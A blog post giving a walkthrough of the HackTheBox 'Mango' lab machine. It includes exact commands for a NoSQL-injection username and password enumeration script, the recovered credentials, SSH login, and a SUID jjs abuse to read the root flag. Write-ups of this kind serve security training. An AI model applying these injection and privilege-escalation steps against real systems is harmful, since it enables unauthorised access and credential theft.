North Tyneside, UK
+1234
steve@spherebyte.com

Mango Walkthrough : HackTheBox

Mango

User Flag

As per most of the Hack The Box machines, the server name often gives a big clue as to the attack vector to use. In this instance, the name Mango implies that the attack will be something to do with MongoDB.

A port scan of the machine returns on a few services running :

Ports 22, 80 and 443 are the only confirmed meaning that the attack is likely to be via the website.

An early scan of the website shows that nothing is available on http and we are are forced to use https to return a google type page with user MrR3boot already signed in. None of the links appear to disclose anything of any interest and the analytics.php page references a code.io link.

There is a certificate error when opening the web page as is expected on a private machine but studying the cert discloses a possible sub domain which may be of interest :

The certificate was signed for the domain staging-order.mango.htb. Navigating to this URL reveals a login page as follows.

After sending some random usernames and passwords to the server, looking at the request and response in Burp and testing the URL with sqlmap, there was nothing screaming out as a method of attack. At his point, I worked on the basis that the back end database was MongoDB as stated earlier due to the box being called Mango. After doing some googling, I found a nosql injection attack which is based on a weakness linked to un-sanitised inputs from the web page.

The script is called NoSQL-MongoDB-injection Username and Password Enumeration and can be found at the following location : https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration Download the script by typing the following from a command prompt :

wget https://raw.githubusercontent.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration/master/nosqli-user-pass-enum.py

From burp we can see the input fields are called username and the password. Initially we are looking to do username enumeration so we use the following parameters in the script :

python2 ./nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -m post -op login:login -ep username

The script starts enumerating usernames on character at a time and eventually returns 2 active users, those being admin and mango. We run the same script again but substituting the -ep variable from username to password as follows :

python2 ./nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -m post -op login:login -ep password

This returns 2 passwords, those being h3mXK8RhU~f{]f5H and t9KcS3>!0B#2

We then proceed to logon to the box over ssh with credentials mango: h3mXK8RhU~f{]f5H After logging on we can see that the /home/mango folder is empty and the user.txt file is located within the /home/admin folder. Attempting to cat the user.txt file gives us permission denied.

We su to admin and supply the second password which we found from the MongoDB enumeration script as shown below :

We can then view the user.txt file and submit the user flag

Root Flag

We start by carrying out standard enumeration of the server from the existing shell. We can see that we don’t have access to the /etc/sudoers file and as admin we don’t have permission to elevate privileges to look at any default sudo entries.

After looking at the SUID executables on the server, we can see a lot of commands are returned. The SUID (set user ID) is a feature of the Linux OS which permits users to execute programs under the context of a different user. eg. Some programs may be run by a standard user but run under the context of root which makes this list interesting.

After looking at all of the programs, we can see an entry for /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs. This is a java interpreter which is installed as part of the Java Development Kit and is used by devs to execute java on the command shell.

I searched mutliple websites to see if there was an option to get a reverse shell from a jjs prompt and while I found several which made this easy from a windows host, there was nothing which indicated this could be easily done from linux. I then searched for how to read a file from the file system and found a jjs one liner on the api meister website : https://apimeister.com/2015/06/12/read-the-content-of-a-file-in-one-line-in-jjs.html

I adapted the script from here to change the file to /root/root.txt and entered this into the jjs shell. This executed without any errors.

After the script has run, if you enter print(content) to output the value of the content variable to the screen, this will contain the root flag.

Steve.

Leave a Reply

Your email address will not be published. Required fields are marked *